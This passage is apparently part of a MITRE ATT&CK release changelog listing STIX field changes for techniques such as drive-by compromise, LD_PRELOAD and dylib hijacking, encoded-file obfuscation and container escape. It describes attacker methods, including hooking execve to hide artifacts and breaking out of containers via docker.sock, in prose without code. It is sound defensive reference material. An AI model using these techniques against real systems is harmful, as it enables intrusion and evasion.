Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised, allowing adversaries to inject malicious code
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces that allow user-controllable content are leveraged for the insertion of malicious scripts or iFrames (e.g., cross-site scripting)
Browser push notifications may also be abused by adversaries and leveraged for malicious code injection via [User Execution](https://attack.mitre.org/techniques/T1204). By clicking "allow" on browser push notifications, users may be granting a website permission to run JavaScript code on their browser.(Citation: Push notifications - viruspositive)(Citation: push notification -mcafee)(Citation: push notifications - malwarebytes)
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or a particular region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. The user may be required to assist in this process by enabling scripting, notifications, or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, the adversary will gain code execution on the user's system unless other protections are in place. In some cases, a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. |
| external_references[2]['source_name'] | Volexity OceanLotus Nov 2017 | push notifications - malwarebytes |
| external_references[2]['description'] | Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017. | Pieter Arntz. (2019, January 22). Browser push notifications: a feature asking to be abused. Retrieved March 14, 2025. |
| external_references[2]['url'] | https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/ | https://www.malwarebytes.com/blog/news/2019/01/browser-push-notifications-feature-asking-abused |
| x_mitre_version | 1.6 | 1.7 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'push notification -mcafee', 'description': 'Craig Schmugar. (2021, May 17). Scammers Impersonating Windows Defender to Push Malicious Windows Apps. Retrieved March 14, 2025.', 'url': 'https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-impersonating-windows-defender-to-push-malicious-windows-apps/'} |
| external_references | | {'source_name': 'Push notifications - viruspositive', 'description': 'Gaurav Sethi. (2021, December 14). The Dark Side of Web Push Notifications. Retrieved March 14, 2025.', 'url': 'https://viruspositive.com/resources/blogs/the-dark-side-of-web-push-notifications'} |
| x_mitre_contributors | | Frank Angiolelli |
[T1574.004] Hijack Execution Flow: Dylib Hijacking
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:39.601000+00:00 | 2025-04-15 19:59:24.300000+00:00 |
| external_references[6]['description'] | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021. | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://taomm.org/vol1/pdfs.html | https://taomm.org/vol1/read.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1559.002] Inter-Process Communication: Dynamic Data Exchange
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-15 18:57:21.881000+00:00 | 2025-04-16 20:37:15.927000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
[T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking
Current version: 2.1
Version changed from: 2.0 → 2.1
|
|
|---|
| t | Adversaries may execute their own malicious payloads by hija | t | Adversaries may execute their own malicious payloads by hija |
| cking environment variables the dynamic linker uses to load | | cking environment variables the dynamic linker uses to load |
| shared libraries. During the execution preparation phase of | | shared libraries. During the execution preparation phase of |
| a program, the dynamic linker loads specified absolute paths | | a program, the dynamic linker loads specified absolute paths |
| of shared libraries from environment variables and files, s | | of shared libraries from various environment variables and |
| uch as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT | | files, such as <code>LD_PRELOAD</code> on Linux or <code>DYL |
| _LIBRARIES</code> on macOS. Libraries specified in environme | | D_INSERT_LIBRARIES</code> on macOS.(Citation: TheEvilBit DYL |
| nt variables are loaded first, taking precedence over system | | D_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(C |
| libraries with the same function name.(Citation: Man LD.SO) | | itation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Li |
| (Citation: TLDP Shared Libraries)(Citation: Apple Doco Archi | | braries specified in environment variables are loaded first, |
| ve Dynamic Libraries) These variables are often used by deve | | taking precedence over system libraries with the same funct |
| lopers to debug binaries without needing to recompile, decon | | ion name.(Citation: Man LD.SO)(Citation: TLDP Shared Librari |
| flict mapped symbols, and implement custom functions without | | es)(Citation: Apple Doco Archive Dynamic Libraries) Each pla |
| changing the original library.(Citation: Baeldung LD_PRELOA | | tform's linker uses an extensive list of environment variabl |
| D) On Linux and macOS, hijacking dynamic linker variables m | | es at different points in execution. These variables are oft |
| ay grant access to the victim process's memory, system/netwo | | en used by developers to debug binaries without needing to r |
| rk resources, and possibly elevated privileges. This method | | ecompile, deconflict mapped symbols, and implement custom fu |
| may also evade detection from security products since the ex | | nctions in the original library.(Citation: Baeldung LD_PRELO |
| ecution is masked under a legitimate process. Adversaries ca | | AD) Hijacking dynamic linker variables may grant access to |
| n set environment variables via the command line using the < | | the victim process's memory, system/network resources, and p |
| code>export</code> command, <code>setenv</code> function, or | | ossibly elevated privileges. On Linux, adversaries may set < |
| <code>putenv</code> function. Adversaries can also leverage | | code>LD_PRELOAD</code> to point to malicious libraries that |
| [Dynamic Linker Hijacking](https://attack.mitre.org/techniq | | match the name of legitimate libraries which are requested b |
| ues/T1574/006) to export variables in a shell or set variabl | | y a victim program, causing the operating system to load the |
| es programmatically using higher level syntax such Python’s | | adversary's malicious code upon execution of the victim pro |
| <code>os.environ</code>. On Linux, adversaries may set <cod | | gram. For example, adversaries have used `LD_PRELOAD` to inj |
| e>LD_PRELOAD</code> to point to malicious libraries that mat | | ect a malicious library into every descendant process of the |
| ch the name of legitimate libraries which are requested by a | | `sshd` daemon, resulting in execution under a legitimate pr |
| victim program, causing the operating system to load the ad | | ocess. When the executing sub-process calls the `execve` fun |
| versary's malicious code upon execution of the victim progra | | ction, for example, the malicious library’s `execve` functio |
| m. <code>LD_PRELOAD</code> can be set via the environment va | | n is executed rather than the system function `execve` conta |
| riable or <code>/etc/ld.so.preload</code> file.(Citation: Ma | | ined in the system library on disk. This allows adversaries |
| n LD.SO)(Citation: TLDP Shared Libraries) Libraries specifie | | to [Hide Artifacts](https://attack.mitre.org/techniques/T156 |
| d by <code>LD_PRELOAD</code> are loaded and mapped into memo | | 4) from detection, as hooking system functions such as `exec |
| ry by <code>dlopen()</code> and <code>mmap()</code> respecti | | ve` and `readdir` enables malware to scrub its own artifacts |
| vely.(Citation: Code Injection on Linux and macOS)(Citation: | | from the results of commands such as `ls`, `ldd`, `iptables |
| Uninformed Needle) (Citation: Phrack halfdead 1997)(Citatio | | `, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Int |
| n: Brown Exploiting Linkers) On macOS this behavior is con | | ezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit |
| ceptually the same as on Linux, differing only in how the ma | | 2024) Hijacking dynamic linker variables may grant access t |
| cOS dynamic libraries (dyld) is implemented at a lower level | | o the victim process's memory, system/network resources, and |
| . Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> | | possibly elevated privileges. |
| environment variable to point to malicious libraries contai | | |
| ning names of legitimate libraries or functions requested by | | |
| a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIE | | |
| S)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilond | | |
| o DYLD_INSERT_LIBRARIES Catalina Bypass) | | |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:40.146000+00:00 | 2025-04-15 19:58:36.147000+00:00 |
| description | Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.
On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) | Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD)
Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024)
Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. |
| external_references[5]['source_name'] | Code Injection on Linux and macOS | ESET Ebury Oct 2017 |
| external_references[5]['description'] | Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017. | Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021. |
| external_references[5]['url'] | https://www.datawire.io/code-injection-on-linux-and-macos/ | https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
| external_references[7] | {'source_name': 'Phrack halfdead 1997', 'description': 'halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.', 'url': 'http://phrack.org/issues/51/8.html'} | {'source_name': 'Elastic Security Labs Pumakit 2024', 'description': 'Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing PUMAKIT. Retrieved March 24, 2025.', 'url': 'https://www.elastic.co/security-labs/declawing-pumakit'} |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Intezer Symbiote 2022', 'description': 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.', 'url': 'https://intezer.com/blog/research/new-linux-threat-symbiote/'} |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| external_references | {'source_name': 'Uninformed Needle', 'description': 'skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.', 'url': 'http://hick.org/code/skape/papers/needle.txt'} | |
| external_references | {'source_name': 'Brown Exploiting Linkers', 'description': 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.', 'url': 'http://www.nth-dimension.org.uk/pub/BTL.pdf'} | |
[T1568] Dynamic Resolution
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 18:26:23.782000+00:00 | 2025-04-15 19:58:44.211000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1055.001] Process Injection: Dynamic-link Library Injection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-11 21:34:38.558000+00:00 | 2025-04-16 20:37:22.834000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
[T1548.004] Abuse Elevation Control Mechanism: Elevated Execution with Prompt
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['root'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-19 16:35:18.492000+00:00 | 2025-04-16 20:37:19.503000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1027.009] Obfuscated Files or Information: Embedded Payloads
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-29 21:14:57.263000+00:00 | 2025-04-15 19:58:03.051000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1546.014] Event Triggered Execution: Emond
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 00:16:01.732000+00:00 | 2025-04-16 20:37:18.374000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1573] Encrypted Channel
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:29:47.903000+00:00 | 2025-04-15 19:59:01.172000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027.013] Obfuscated Files or Information: Encrypted/Encoded File
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may encrypt or encode files to obfuscate strings | t | Adversaries may encrypt or encode files to obfuscate strings |
| , bytes, and other specific patterns to impede detection. En | | , bytes, and other specific patterns to impede detection. En |
| crypting and/or encoding file content aims to conceal malici | | crypting and/or encoding file content aims to conceal malici |
| ous artifacts within a file used in an intrusion. Many other | | ous artifacts within a file used in an intrusion. Many other |
| techniques, such as [Software Packing](https://attack.mitre | | techniques, such as [Software Packing](https://attack.mitre |
| .org/techniques/T1027/002), [Steganography](https://attack.m | | .org/techniques/T1027/002), [Steganography](https://attack.m |
| itre.org/techniques/T1027/003), and [Embedded Payloads](http | | itre.org/techniques/T1027/003), and [Embedded Payloads](http |
| s://attack.mitre.org/techniques/T1027/009), share this same | | s://attack.mitre.org/techniques/T1027/009), share this same |
| broad objective. Encrypting and/or encoding files could lead | | broad objective. Encrypting and/or encoding files could lead |
| to a lapse in detection of static signatures, only for this | | to a lapse in detection of static signatures, only for this |
| malicious content to be revealed (i.e., [Deobfuscate/Decode | | malicious content to be revealed (i.e., [Deobfuscate/Decode |
| Files or Information](https://attack.mitre.org/techniques/T | | Files or Information](https://attack.mitre.org/techniques/T |
| 1140)) at the time of execution/use. This type of file obfu | | 1140)) at the time of execution/use. This type of file obfu |
| scation can be applied to many file artifacts present on vic | | scation can be applied to many file artifacts present on vic |
| tim hosts, such as malware log/configuration and payload fil | | tim hosts, such as malware log/configuration and payload fil |
| es.(Citation: File obfuscation) Files can be encrypted with | | es.(Citation: File obfuscation) Files can be encrypted with |
| a hardcoded or user-supplied key, as well as otherwise obfus | | a hardcoded or user-supplied key, as well as otherwise obfus |
| cated using standard encoding/compression schemes such as Ba | | cated using standard encoding schemes such as Base64. The e |
| se64. The entire content of a file may be obfuscated, or ju | | ntire content of a file may be obfuscated, or just specific |
| st specific functions or values (such as C2 addresses). Encr | | functions or values (such as C2 addresses). Encryption and e |
| yption and encoding may also be applied in redundant layers | | ncoding may also be applied in redundant layers for addition |
| for additional protection. For example, adversaries may abu | | al protection. For example, adversaries may abuse password- |
| se password-protected Word documents or self-extracting (SFX | | protected Word documents or self-extracting (SFX) archives a |
| ) archives as a method of encrypting/encoding a file such as | | s a method of encrypting/encoding a file such as a [Phishing |
| a [Phishing](https://attack.mitre.org/techniques/T1566) pay | | ](https://attack.mitre.org/techniques/T1566) payload. These |
| load. These files typically function by attaching the intend | | files typically function by attaching the intended archived |
| ed archived content to a decompressor stub that is executed | | content to a decompressor stub that is executed when the fil |
| when the file is invoked (e.g., [User Execution](https://att | | e is invoked (e.g., [User Execution](https://attack.mitre.or |
| ack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/ | | g/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File |
| Encoded File) Adversaries may also abuse file-specific as | | ) Adversaries may also abuse file-specific as well as cust |
| well as custom encoding schemes. For example, Byte Order Mar | | om encoding schemes. For example, Byte Order Mark (BOM) head |
| k (BOM) headers in text files may be abused to manipulate an | | ers in text files may be abused to manipulate and obfuscate |
| d obfuscate file content until [Command and Scripting Interp | | file content until [Command and Scripting Interpreter](https |
| reter](https://attack.mitre.org/techniques/T1059) execution. | | ://attack.mitre.org/techniques/T1059) execution. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:32:45.108000+00:00 | 2025-04-15 19:58:05.840000+00:00 |
| description | Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File)
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution. | Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File)
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution. |
| x_mitre_version | 1.0 | 1.1 |
[T1480.001] Execution Guardrails: Environmental Keying
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host Forensic Analysis', 'Signature-based Detection', 'Static File Analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-04 14:52:51.290000+00:00 | 2025-04-15 19:59:20.646000+00:00 |
| external_references[7]['description'] | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved November 17, 2024. |
| external_references[7]['url'] | https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ | http://web.archive.org/web/20200608093807/https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1611] Escape to Host
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may break out of a container to gain access to t | t | Adversaries may break out of a container or virtualized envi |
| he underlying host. This can allow an adversary access to ot | | ronment to gain access to the underlying host. This can allo |
| her containerized resources from the host level or to the ho | | w an adversary access to other containerized or virtualized |
| st itself. In principle, containerized resources should prov | | resources from the host level or to the host itself. In prin |
| ide a clear separation of application functionality and be i | | ciple, containerized / virtualized resources should provide |
| solated from the host environment.(Citation: Docker Overview | | a clear separation of application functionality and be isola |
| ) There are multiple ways an adversary may escape to a host | | ted from the host environment.(Citation: Docker Overview) T |
| environment. Examples include creating a container configur | | here are multiple ways an adversary may escape from a contai |
| ed to mount the host’s filesystem using the bind parameter, | | ner to a host environment. Examples include creating a conta |
| which allows the adversary to drop payloads and execute cont | | iner configured to mount the host’s filesystem using the bin |
| rol utilities such as cron on the host; utilizing a privileg | | d parameter, which allows the adversary to drop payloads and |
| ed container to run commands or load a malicious kernel modu | | execute control utilities such as cron on the host; utilizi |
| le on the underlying host; or abusing system calls such as ` | | ng a privileged container to run commands or load a maliciou |
| unshare` and `keyctl` to escalate privileges and steal secre | | s kernel module on the underlying host; or abusing system ca |
| ts.(Citation: Docker Bind Mounts)(Citation: Trend Micro Priv | | lls such as `unshare` and `keyctl` to escalate privileges an |
| ileged Container)(Citation: Intezer Doki July 20)(Citation: | | d steal secrets.(Citation: Docker Bind Mounts)(Citation: Tre |
| Container Escape)(Citation: Crowdstrike Kubernetes Container | | nd Micro Privileged Container)(Citation: Intezer Doki July 2 |
| Escape)(Citation: Keyctl-unmask) Additionally, an adversar | | 0)(Citation: Container Escape)(Citation: Crowdstrike Kuberne |
| y may be able to exploit a compromised container with a moun | | tes Container Escape)(Citation: Keyctl-unmask) Additionally |
| ted container management socket, such as `docker.sock`, to b | | , an adversary may be able to exploit a compromised containe |
| reak out of the container via a [Container Administration Co | | r with a mounted container management socket, such as `docke |
| mmand](https://attack.mitre.org/techniques/T1609).(Citation: | | r.sock`, to break out of the container via a [Container Admi |
| Container Escape) Adversaries may also escape via [Exploita | | nistration Command](https://attack.mitre.org/techniques/T160 |
| tion for Privilege Escalation](https://attack.mitre.org/tech | | 9).(Citation: Container Escape) Adversaries may also escape |
| niques/T1068), such as exploiting vulnerabilities in global | | via [Exploitation for Privilege Escalation](https://attack.m |
| symbolic links in order to access the root directory of a ho | | itre.org/techniques/T1068), such as exploiting vulnerabiliti |
| st machine.(Citation: Windows Server Containers Are Open) G | | es in global symbolic links in order to access the root dire |
| aining access to the host may provide the adversary with the | | ctory of a host machine.(Citation: Windows Server Containers |
| opportunity to achieve follow-on objectives, such as establ | | Are Open) In ESXi environments, an adversary may exploit a |
| ishing persistence, moving laterally within the environment, | | vulnerability in order to escape from a virtual machine int |
| accessing other containers running on the host, or setting | | o the hypervisor.(Citation: Broadcom VMSA-2025-004) Gaining |
| up a command and control channel on the host. | | access to the host may provide the adversary with the oppor |
| | | tunity to achieve follow-on objectives, such as establishing |
| | | persistence, moving laterally within the environment, acces |
| | | sing other containers or virtual machines running on the hos |
| | | t, or setting up a command and control channel on the host. |
New Mitigations:
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User', 'root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-19 12:42:18.632000+00:00 | 2025-04-15 19:58:28.417000+00:00 |
| description | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
